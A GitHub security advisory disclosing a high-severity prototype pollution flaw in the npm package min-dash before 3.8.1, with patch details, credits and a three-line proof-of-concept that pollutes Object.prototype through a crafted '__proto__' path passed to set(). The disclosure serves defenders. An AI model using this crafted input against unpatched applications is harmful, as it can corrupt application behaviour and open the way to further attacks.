Skip to content

Prototype pollution in min-dash < 3.8.1

High severity GitHub Reviewed Published Jan 27, 2022 in bpmn-io/min-dash • Updated Jan 11, 2023

Package

npm min-dash (npm)

Affected versions

< 3.8.1

Patched versions

3.8.1

Description

Impact

The set method is vulnerable to prototype pollution with specially crafted inputs.

// insert the following into poc.js and run node poc,js (after installing the package)
 
let parser = require("min-dash");
parser.set({}, [["__proto__"], "polluted"], "success");
console.log(polluted);

Patches

min-dash>=3.8.1 fix the issue.

Workarounds

No workarounds exist for the issue.

References

Closed via bpmn-io/min-dash#21.

Credits

Credits to Cristian-Alexandru STAICU who found the vulnerability and to Idan Digmi from the Snyk Security Team who reported the vulnerability to us, responsibly.

References

@nikku nikku published to bpmn-io/min-dash Jan 27, 2022
Reviewed Jan 27, 2022
Published to the GitHub Advisory Database Feb 1, 2022
Last updated Jan 11, 2023

Severity

High

Weaknesses

CVE ID

No known CVE

GHSA ID

GHSA-2m53-83f3-562j

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.